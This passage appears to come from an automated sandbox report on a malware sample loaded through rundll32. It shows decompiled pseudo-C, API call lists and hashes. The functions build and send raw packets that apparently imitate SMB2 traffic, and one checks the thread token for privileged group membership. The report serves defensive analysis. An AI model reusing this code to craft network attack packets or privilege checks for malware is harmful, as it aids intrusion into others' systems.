                                                                                                                                                  • API String ID: 1343258794-115798760
                                                                                                                                                  • Opcode ID: 07861db1d264d566a06810c6dedf5bef3f3ee4f6925a938daf230d50726f280b
                                                                                                                                                  • Instruction ID: e85cd47068b6d7d756a4005acb836b7a427114217c64099bca8498e69f3ca201
                                                                                                                                                  • Opcode Fuzzy Hash: 07861db1d264d566a06810c6dedf5bef3f3ee4f6925a938daf230d50726f280b
                                                                                                                                                  • Instruction Fuzzy Hash: 3F317EB2900208AFEB209B61DE48DDB7BFCEF49750B848565B606D2144EA35FA45CFA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                                  			E04773071(void* __ecx, intOrPtr _a4, void* _a8, short _a12, void** _a16, int* _a20) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				void* _t25;
                                                                                                                                                  				void* _t31;
                                                                                                                                                  				void* _t37;
                                                                                                                                                  				void* _t40;
                                                                                                                                                  				signed int _t43;
                                                                                                                                                  				int _t48;
                                                                                                                                                  				int* _t60;
                                                                                                                                                  
                                                                                                                                                  				_v5 = 0;
                                                                                                                                                  				_t25 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                  				_v12 = _t25;
                                                                                                                                                  				if(_t25 == 0) {
                                                                                                                                                  					L9:
                                                                                                                                                  					return _v5;
                                                                                                                                                  				}
                                                                                                                                                  				_t40 = HeapAlloc(GetProcessHeap(), 8, 0x3f);
                                                                                                                                                  				if(_t40 == 0) {
                                                                                                                                                  					L8:
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                  					goto L9;
                                                                                                                                                  				}
                                                                                                                                                  				_t43 = 9;
                                                                                                                                                  				_t31 = memcpy(_t40, _a8, _t43 << 2);
                                                                                                                                                  				__imp__#9(0x3b);
                                                                                                                                                  				 *(_t40 + 2) = _t31;
                                                                                                                                                  				 *((short*)(_t40 + 0x29)) = _a12;
                                                                                                                                                  				 *((char*)(_t40 + 8)) = 0x2e;
                                                                                                                                                  				 *((short*)(_t40 + 0x24)) = 0xff0c;
                                                                                                                                                  				 *((short*)(_t40 + 0x2f)) = 0xfde8;
                                                                                                                                                  				 *((short*)(_t40 + 0x31)) = 0xfde8;
                                                                                                                                                  				 *((short*)(_t40 + 0x37)) = 0xfde8;
                                                                                                                                                  				__imp__#19(_a4, _t40, 0x3f, 0);
                                                                                                                                                  				if(0xfde8 > 0) {
                                                                                                                                                  					__imp__#16(_a4, _v12, 0xffff, 0);
                                                                                                                                                  					_t60 = _a20;
                                                                                                                                                  					 *_t60 = 0xfde8;
                                                                                                                                                  					if(0xfde8 > 0 &&  *((intOrPtr*)(_v12 + 9)) == 0) {
                                                                                                                                                  						_t37 = HeapAlloc(GetProcessHeap(), 8, 0xfde8);
                                                                                                                                                  						 *_a16 = _t37;
                                                                                                                                                  						_t48 =  *_t60;
                                                                                                                                                  						if(_t48 != 0) {
                                                                                                                                                  							memcpy(_t37, _v12, _t48);
                                                                                                                                                  							_v5 = 1;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				HeapFree(GetProcessHeap(), 8, _t40);
                                                                                                                                                  				goto L8;
                                                                                                                                                  			}












                                                                                                                                                  0x04773085
                                                                                                                                                  0x04773092
                                                                                                                                                  0x04773094
                                                                                                                                                  0x04773099
                                                                                                                                                  0x04773173
                                                                                                                                                  0x04773179
                                                                                                                                                  0x04773179
                                                                                                                                                  0x047730a9
                                                                                                                                                  0x047730ad
                                                                                                                                                  0x04773160
                                                                                                                                                  0x0477316c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04773172
                                                                                                                                                  0x047730b8
                                                                                                                                                  0x047730bd
                                                                                                                                                  0x047730bf
                                                                                                                                                  0x047730c5
                                                                                                                                                  0x047730d2
                                                                                                                                                  0x047730e1
                                                                                                                                                  0x047730e5
                                                                                                                                                  0x047730eb
                                                                                                                                                  0x047730ef
                                                                                                                                                  0x047730f3
                                                                                                                                                  0x047730f7
                                                                                                                                                  0x047730ff
                                                                                                                                                  0x0477310d
                                                                                                                                                  0x04773113
                                                                                                                                                  0x04773116
                                                                                                                                                  0x0477311a
                                                                                                                                                  0x0477312e
                                                                                                                                                  0x04773137
                                                                                                                                                  0x04773139
                                                                                                                                                  0x0477313d
                                                                                                                                                  0x04773144
                                                                                                                                                  0x0477314c
                                                                                                                                                  0x0477314c
                                                                                                                                                  0x0477313d
                                                                                                                                                  0x0477311a
                                                                                                                                                  0x0477315a
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000FFFF,74CB4F20,00000000,?,?,?,04774F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F), ref: 04773089
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,04774F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04773092
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000003F,74CB5520,?,?,?,04774F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 047730A4
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,04774F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 047730A7
                                                                                                                                                  • htons.WS2_32(0000003B), ref: 047730BF
                                                                                                                                                  • send.WS2_32(0000002F,00000000,0000003F,00000000), ref: 047730F7
                                                                                                                                                  • recv.WS2_32(0000002F,0000002F,0000FFFF,00000000), ref: 0477310D
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04774F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04773127
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,04774F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 0477312E
                                                                                                                                                  • memcpy.MSVCRT ref: 04773144
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04774F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04773153
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,04774F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 0477315A
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000002F,?,?,?,04774F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04773165
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,04774F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 0477316C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$Alloc$Free$htonsmemcpyrecvsend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 317911368-0
                                                                                                                                                  • Opcode ID: d111cdf449f17112d61267e83a63f273e97f57c7306f71384d15ddd8dfe872a9
                                                                                                                                                  • Instruction ID: 4445c8b971684cf08e1e06cbdb4befcb3e8332010e7238ba01935fecf8ea097f
                                                                                                                                                  • Opcode Fuzzy Hash: d111cdf449f17112d61267e83a63f273e97f57c7306f71384d15ddd8dfe872a9
                                                                                                                                                  • Instruction Fuzzy Hash: C6319E71600305BBEF205FA4DC49FAA7B69FF88340F548059FA05EB280EA759801DB25
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0477892A() {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				char* _t31;
                                                                                                                                                  				DWORD* _t32;
                                                                                                                                                  				long _t33;
                                                                                                                                                  				void* _t37;
                                                                                                                                                  				void* _t39;
                                                                                                                                                  				void** _t43;
                                                                                                                                                  
                                                                                                                                                  				_v16 = 0;
                                                                                                                                                  				_v12 = 0;
                                                                                                                                                  				if(OpenThreadToken(GetCurrentThread(), 0x20008, 1,  &_v12) == 0) {
                                                                                                                                                  					GetLastError();
                                                                                                                                                  					L23:
                                                                                                                                                  					return _v16;
                                                                                                                                                  				}
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				if(GetTokenInformation(_v12, 2, 0, 0,  &_v8) != 0) {
                                                                                                                                                  					L21:
                                                                                                                                                  					CloseHandle(_v12);
                                                                                                                                                  					goto L23;
                                                                                                                                                  				}
                                                                                                                                                  				if(GetLastError() != 0x7a) {
                                                                                                                                                  					L20:
                                                                                                                                                  					goto L21;
                                                                                                                                                  				}
                                                                                                                                                  				_t39 = GlobalAlloc(0x40, _v8);
                                                                                                                                                  				if(_t39 == 0) {
                                                                                                                                                  					GetLastError();
                                                                                                                                                  					L19:
                                                                                                                                                  					goto L20;
                                                                                                                                                  				}
                                                                                                                                                  				if(GetTokenInformation(_v12, 2, _t39, _v8,  &_v8) == 0) {
                                                                                                                                                  					GetLastError();
                                                                                                                                                  					L17:
                                                                                                                                                  					GlobalFree(_t39);
                                                                                                                                                  					goto L19;
                                                                                                                                                  				}
                                                                                                                                                  				_t37 = 0;
                                                                                                                                                  				if( *_t39 > 0) {
                                                                                                                                                  					_t11 = _t39 + 4; // 0x4
                                                                                                                                                  					_t43 = _t11;
                                                                                                                                                  					while(_v16 == 0) {
                                                                                                                                                  						_t31 = GetSidSubAuthorityCount( *_t43);
                                                                                                                                                  						if(_t31 != 0 &&  *_t31 >= 4) {
                                                                                                                                                  							_t32 = GetSidSubAuthority( *_t43, 4);
                                                                                                                                                  							if(_t32 != 0) {
                                                                                                                                                  								_t33 =  *_t32;
                                                                                                                                                  								if(_t33 == 0x200 || _t33 == 0x207) {
                                                                                                                                                  									_v16 = 1;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						_t37 = _t37 + 1;
                                                                                                                                                  						_t43 =  &(_t43[2]);
                                                                                                                                                  						if(_t37 <  *_t39) {
                                                                                                                                                  							continue;
                                                                                                                                                  						} else {
                                                                                                                                                  							goto L17;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  			}












                                                                                                                                                  0x0477893e
                                                                                                                                                  0x04778941
                                                                                                                                                  0x04778953
                                                                                                                                                  0x04778a17
                                                                                                                                                  0x04778a1d
                                                                                                                                                  0x04778a22
                                                                                                                                                  0x04778a22
                                                                                                                                                  0x04778964
                                                                                                                                                  0x04778971
                                                                                                                                                  0x04778a0c
                                                                                                                                                  0x04778a0f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04778a0f
                                                                                                                                                  0x04778983
                                                                                                                                                  0x04778a0b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04778a0b
                                                                                                                                                  0x04778995
                                                                                                                                                  0x04778999
                                                                                                                                                  0x04778a08
                                                                                                                                                  0x04778a0a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04778a0a
                                                                                                                                                  0x047789ac
                                                                                                                                                  0x047789fd
                                                                                                                                                  0x047789ff
                                                                                                                                                  0x04778a00
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04778a00
                                                                                                                                                  0x047789ae
                                                                                                                                                  0x047789b2
                                                                                                                                                  0x047789b4
                                                                                                                                                  0x047789b4
                                                                                                                                                  0x047789b7
                                                                                                                                                  0x047789bf
                                                                                                                                                  0x047789c7
                                                                                                                                                  0x047789d2
                                                                                                                                                  0x047789da
                                                                                                                                                  0x047789dc
                                                                                                                                                  0x047789e3
                                                                                                                                                  0x047789ec
                                                                                                                                                  0x047789ec
                                                                                                                                                  0x047789e3
                                                                                                                                                  0x047789da
                                                                                                                                                  0x047789f3
                                                                                                                                                  0x047789f4
                                                                                                                                                  0x047789f9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047789fb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047789fb
                                                                                                                                                  0x047789f9
                                                                                                                                                  0x047789b7

                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 04778944
                                                                                                                                                  • OpenThreadToken.ADVAPI32(00000000), ref: 0477894B
                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0477896D
                                                                                                                                                  • GetLastError.KERNEL32 ref: 0477897E
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 0477898F
                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 047789A8
                                                                                                                                                  • GetSidSubAuthorityCount.ADVAPI32(00000004), ref: 047789BF
                                                                                                                                                  • GetSidSubAuthority.ADVAPI32(00000004,00000004), ref: 047789D2
                                                                                                                                                  • GetLastError.KERNEL32 ref: 047789FD
                                                                                                                                                  • GlobalFree.KERNEL32 ref: 04778A00
                                                                                                                                                  • GetLastError.KERNEL32 ref: 04778A08
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 04778A0F
                                                                                                                                                  • GetLastError.KERNEL32 ref: 04778A17
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$Token$AuthorityGlobalInformationThread$AllocCloseCountCurrentFreeHandleOpen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1283781744-0
                                                                                                                                                  • Opcode ID: 8306a5a0690b22c03ae7fb05e62f3f374a1bc25e38aa2b57b3482ef2cde8528b
                                                                                                                                                  • Instruction ID: e0ec08384df94b63ce183eb65f64f71e88a8cd8d507ddab56e7c70d6cc83eb3e
                                                                                                                                                  • Opcode Fuzzy Hash: 8306a5a0690b22c03ae7fb05e62f3f374a1bc25e38aa2b57b3482ef2cde8528b
                                                                                                                                                  • Instruction Fuzzy Hash: CF318F31900205EBEF20AFA5DD8CB9D7F78EF00750F928165E500A2241E779AE41DF66
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                                  			E04772F5A(intOrPtr _a4, void* _a8, short _a12, intOrPtr _a16, intOrPtr _a20, short _a24, void* _a28, signed int _a32) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				int _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				void* _t36;
                                                                                                                                                  				signed int _t38;
                                                                                                                                                  				short _t45;
                                                                                                                                                  				signed short _t50;
                                                                                                                                                  				void* _t53;
                                                                                                                                                  				void* _t57;
                                                                                                                                                  				signed int _t59;
                                                                                                                                                  				short _t61;
                                                                                                                                                  				void* _t70;
                                                                                                                                                  				void* _t71;
                                                                                                                                                  
                                                                                                                                                  				_v5 = 0;
                                                                                                                                                  				_t36 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                  				_v16 = _t36;
                                                                                                                                                  				if(_t36 != 0) {
                                                                                                                                                  					_t38 = _a32 & 0x0000ffff;
                                                                                                                                                  					_v12 = _t38;
                                                                                                                                                  					_t57 = HeapAlloc(GetProcessHeap(), 8, _t38 + 0x40);
                                                                                                                                                  					if(_t57 != 0) {
                                                                                                                                                  						_t59 = 9;
                                                                                                                                                  						memcpy(_t57, _a8, _t59 << 2);
                                                                                                                                                  						_t70 = _v12 + 0x40;
                                                                                                                                                  						_t45 = _t70 - 4;
                                                                                                                                                  						__imp__#9(_t45);
                                                                                                                                                  						 *((short*)(_t57 + 2)) = _t45;
                                                                                                                                                  						 *((short*)(_t57 + 0x29)) = _a12;
                                                                                                                                                  						 *((intOrPtr*)(_t57 + 0x2b)) = _a16;
                                                                                                                                                  						 *((intOrPtr*)(_t57 + 0x2f)) = _a20;
                                                                                                                                                  						 *((short*)(_t57 + 0x33)) = _a24;
                                                                                                                                                  						_t50 = _a32;
                                                                                                                                                  						_t61 = 0x3c;
                                                                                                                                                  						 *(_t57 + 0x35) = _t50;
                                                                                                                                                  						 *(_t57 + 0x39) = _t50;
                                                                                                                                                  						 *((short*)(_t57 + 0x3d)) = _t50 + 1;
                                                                                                                                                  						_t24 = _t57 + 0x40; // 0x40
                                                                                                                                                  						 *((char*)(_t57 + 8)) = 0x2f;
                                                                                                                                                  						 *((short*)(_t57 + 0x24)) = 0xff0c;
                                                                                                                                                  						 *((short*)(_t57 + 0x3b)) = _t61;
                                                                                                                                                  						_t53 = memcpy(_t24, _a28, _v12);
                                                                                                                                                  						__imp__#19(_a4, _t57, _t70, 0);
                                                                                                                                                  						if(_t53 > 0) {
                                                                                                                                                  							_t71 = _v16;
                                                                                                                                                  							__imp__#16(_a4, _t71, 0xffff, 0);
                                                                                                                                                  							if(_t53 > 0 &&  *((intOrPtr*)(_t71 + 9)) == 0) {
                                                                                                                                                  								_v5 = 1;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						HeapFree(GetProcessHeap(), 8, _t57);
                                                                                                                                                  					}
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _v16);
                                                                                                                                                  				}
                                                                                                                                                  				return _v5;
                                                                                                                                                  			}
















                                                                                                                                                  0x04772f6f
                                                                                                                                                  0x04772f7c
                                                                                                                                                  0x04772f7e
                                                                                                                                                  0x04772f83
                                                                                                                                                  0x04772f89
                                                                                                                                                  0x04772f8e
                                                                                                                                                  0x04772f9c
                                                                                                                                                  0x04772fa0
                                                                                                                                                  0x04772fab
                                                                                                                                                  0x04772fae
                                                                                                                                                  0x04772fb3
                                                                                                                                                  0x04772fb6
                                                                                                                                                  0x04772fba
                                                                                                                                                  0x04772fc0
                                                                                                                                                  0x04772fc8
                                                                                                                                                  0x04772fcf
                                                                                                                                                  0x04772fd5
                                                                                                                                                  0x04772fde
                                                                                                                                                  0x04772fe2
                                                                                                                                                  0x04772fe5
                                                                                                                                                  0x04772fe9
                                                                                                                                                  0x04772ff0
                                                                                                                                                  0x04772ff5
                                                                                                                                                  0x04772ff9
                                                                                                                                                  0x04772ffd
                                                                                                                                                  0x04773001
                                                                                                                                                  0x04773007
                                                                                                                                                  0x0477300b
                                                                                                                                                  0x0477301b
                                                                                                                                                  0x04773023
                                                                                                                                                  0x04773025
                                                                                                                                                  0x04773032
                                                                                                                                                  0x0477303a
                                                                                                                                                  0x04773041
                                                                                                                                                  0x04773041
                                                                                                                                                  0x0477303a
                                                                                                                                                  0x0477304f
                                                                                                                                                  0x0477304f
                                                                                                                                                  0x04773061
                                                                                                                                                  0x04773067
                                                                                                                                                  0x0477306e

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000001,00000200,?,?,?,?,?,?,?,?), ref: 04772F73
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 04772F7C
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,7483C2E0), ref: 04772F97
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 04772F9A
                                                                                                                                                  • htons.WS2_32(424D53FE), ref: 04772FBA
                                                                                                                                                  • memcpy.MSVCRT ref: 0477300B
                                                                                                                                                  • send.WS2_32(?,00000000,?,00000000), ref: 0477301B
                                                                                                                                                  • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04773032
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04773048
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0477304F
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 0477305A
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04773061
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocFree$htonsmemcpyrecvsend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2433318192-0
                                                                                                                                                  • Opcode ID: 4f42eb355fe1020facabb0beb0d53ec09747c4e4a212a475b068e0d22a774844
                                                                                                                                                  • Instruction ID: 76cb97f94234b806a7b16e3e4a9dc919a481f6a228f63968a26f5f9d625ea9cc
                                                                                                                                                  • Opcode Fuzzy Hash: 4f42eb355fe1020facabb0beb0d53ec09747c4e4a212a475b068e0d22a774844
                                                                                                                                                  • Instruction Fuzzy Hash: 1631BE75A00345EBEF109FA5D888ADA7BB9FF48300F458099FE08EB241E779D905CB24
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                  			E047732AF(intOrPtr _a4, void* _a8, short _a12, void* _a16, void* _a20, signed short _a24) {
                                                                                                                                                  				signed short _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                  				void* _t27;
                                                                                                                                                  				long _t30;
                                                                                                                                                  				void* _t37;
                                                                                                                                                  				int _t40;
                                                                                                                                                  				signed int _t43;
                                                                                                                                                  				void* _t48;
                                                                                                                                                  				signed int _t50;
                                                                                                                                                  				void* _t64;
                                                                                                                                                  
                                                                                                                                                  				_v16 = 0xbadf00d;
                                                                                                                                                  				_t27 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                  				_v12 = _t27;
                                                                                                                                                  				if(_t27 != 0) {
                                                                                                                                                  					_t30 = (_a24 & 0x0000ffff) + 0x4d;
                                                                                                                                                  					_v8 = _t30;
                                                                                                                                                  					_t48 = HeapAlloc(GetProcessHeap(), 8, _t30);
                                                                                                                                                  					if(_t48 != 0) {
                                                                                                                                                  						_t50 = 9;
                                                                                                                                                  						_t37 = memcpy(_t48, _a8, _t50 << 2);
                                                                                                                                                  						__imp__#9(_v8 + 0xfffffffc);
                                                                                                                                                  						 *(_t48 + 2) = _t37;
                                                                                                                                                  						 *((short*)(_t48 + 0x22)) = _a12;
                                                                                                                                                  						 *((char*)(_t48 + 8)) = 0xa0;
                                                                                                                                                  						_t14 = _t48 + 0x24; // 0x24
                                                                                                                                                  						_t40 = memcpy(_t14, _a16, 0 << 2);
                                                                                                                                                  						_t17 = _t48 + 0x4d; // 0x4d
                                                                                                                                                  						asm("movsb");
                                                                                                                                                  						memcpy(_t17, _a20, _t40);
                                                                                                                                                  						_t43 = _v8 & 0x0000ffff;
                                                                                                                                                  						__imp__#19(_a4, _t48, _t43, 0, 0xa);
                                                                                                                                                  						if(_t43 > 0) {
                                                                                                                                                  							_t64 = _v12;
                                                                                                                                                  							__imp__#16(_a4, _t64, 0xffff, 0);
                                                                                                                                                  							if(_t43 > 0) {
                                                                                                                                                  								_v16 =  *((intOrPtr*)(_t64 + 9));
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						HeapFree(GetProcessHeap(), 8, _t48);
                                                                                                                                                  					}
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                  				}
                                                                                                                                                  				return _v16;
                                                                                                                                                  			}














                                                                                                                                                  0x047732c4
                                                                                                                                                  0x047732d4
                                                                                                                                                  0x047732d6
                                                                                                                                                  0x047732db
                                                                                                                                                  0x047732e6
                                                                                                                                                  0x047732ec
                                                                                                                                                  0x047732f4
                                                                                                                                                  0x047732f8
                                                                                                                                                  0x04773306
                                                                                                                                                  0x0477330d
                                                                                                                                                  0x0477330f
                                                                                                                                                  0x04773318
                                                                                                                                                  0x04773322
                                                                                                                                                  0x0477332b
                                                                                                                                                  0x0477332f
                                                                                                                                                  0x04773332
                                                                                                                                                  0x04773338
                                                                                                                                                  0x0477333c
                                                                                                                                                  0x0477333d
                                                                                                                                                  0x04773342
                                                                                                                                                  0x04773350
                                                                                                                                                  0x04773358
                                                                                                                                                  0x0477335a
                                                                                                                                                  0x04773368
                                                                                                                                                  0x04773370
                                                                                                                                                  0x04773375
                                                                                                                                                  0x04773375
                                                                                                                                                  0x04773370
                                                                                                                                                  0x04773382
                                                                                                                                                  0x04773382
                                                                                                                                                  0x04773394
                                                                                                                                                  0x0477339a
                                                                                                                                                  0x047733a1

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,?), ref: 047732CB
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 047732D4
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,74CB4F20), ref: 047732EF
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 047732F2
                                                                                                                                                  • htons.WS2_32(?), ref: 0477330F
                                                                                                                                                  • memcpy.MSVCRT ref: 0477333D
                                                                                                                                                  • send.WS2_32(?,00000000,?,00000000), ref: 04773350
                                                                                                                                                  • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04773368
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0477337B
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04773382
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 0477338D
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04773394
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocFree$htonsmemcpyrecvsend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2433318192-0
                                                                                                                                                  • Opcode ID: 340583c46754008b9cdbf3d210f1306ff28f3cc5d7e6a0cfeec8fedeb4409cdd
                                                                                                                                                  • Instruction ID: f3a3670388ee10cccffb11dc5827ec0c3719704e6b17f892af4db704f5d7ed63
                                                                                                                                                  • Opcode Fuzzy Hash: 340583c46754008b9cdbf3d210f1306ff28f3cc5d7e6a0cfeec8fedeb4409cdd
                                                                                                                                                  • Instruction Fuzzy Hash: 21317C71A0020ABBEF209FA59D45AAE7BA8EF49310F548055FA05EB281DB78DD05DB60
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 62%
                                                                                                                                                  			E047741E9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, signed short _a12, intOrPtr* _a16) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				signed int _v16;
                                                                                                                                                  				void* _v24;
                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                  				void _v36;
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				signed int _t178;
                                                                                                                                                  				intOrPtr _t182;
                                                                                                                                                  				void* _t190;
                                                                                                                                                  				int _t193;
                                                                                                                                                  				void* _t196;
                                                                                                                                                  				intOrPtr _t211;
                                                                                                                                                  				intOrPtr _t212;
                                                                                                                                                  				intOrPtr _t214;
                                                                                                                                                  				intOrPtr _t215;
